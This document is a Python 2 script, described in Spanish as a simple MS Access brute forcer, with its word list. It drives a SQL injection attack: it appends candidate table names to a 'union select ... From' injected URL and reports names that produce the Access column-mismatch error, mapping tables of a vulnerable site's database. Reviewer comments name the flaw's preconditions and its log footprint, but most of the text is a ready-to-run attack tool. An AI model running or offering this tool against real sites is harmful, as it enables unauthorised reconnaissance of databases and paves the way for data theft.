Un simple brute force de MS Access usando una lista de palabras predefinidas
access-brute.py
import sys
import os
import urllib
from urllib import urlopen
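# Access Table Brute (Python 2): for every candidate name in tester.txt,
# request <url><name> and print the names whose response body contains the
# Access "number of columns ... do not match" error text.
#
# Review notes:
# - The check depends on two properties of the target page: the query-string
#   value is concatenated into the SQL statement, and the raw database error
#   is returned to the client. Parameterised queries and a generic error
#   page remove both, and with them the signal this script reads.
# - One request is sent per word-list line, so in web-server logs a run
#   appears as consecutive requests to the same page whose query string
#   contains "union select" followed by a changing table name.
if os.name == "nt":
    # "cls" only exists in the Windows shell; on other systems the call
    # did nothing except emit a shell error.
    os.system("cls")
print "Access Table Brute v1 Written by nova"
print "-------------------------------------"
print
print "Usage: access-brute.py url"
print "Eg. access-brute.py http://host.com/viewproduct.asp?id=1+union+select+1+From+\n"
if len(sys.argv) < 2:
    # Without this guard a missing argument ended in an IndexError
    # traceback right after the usage text.
    sys.exit(1)
url = sys.argv[1]
# Error text the response is searched for; a match is treated as "the
# appended name was accepted as a table".
substring = "The number of columns in the two selected tables or queries of a union query do not match"
print url
print
print "Tables:\n"
print "-------"
# "with" closes the word list even when a request raises.
with open("tester.txt", 'r') as f:
    for line in f:
        # Drop the line terminator so it is neither sent nor printed twice.
        candidate = line.rstrip("\r\n")
        if not candidate:
            # A blank line would only re-request the bare URL.
            continue
        feeddata = urllib.urlopen(url + candidate).read()
        if substring in feeddata:
            print candidate
print "-------------"
print "scan complete"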
wordlist
admin
users
customers
customer
members
clients
tblusers
tbluser
ordermain
orders
sales
stores
titles
msysobjects
MSysAccessObjects
MSysAccessXML
MSysACEs
MSysQueries
MSysRelationships
Northwind
wtblObjectList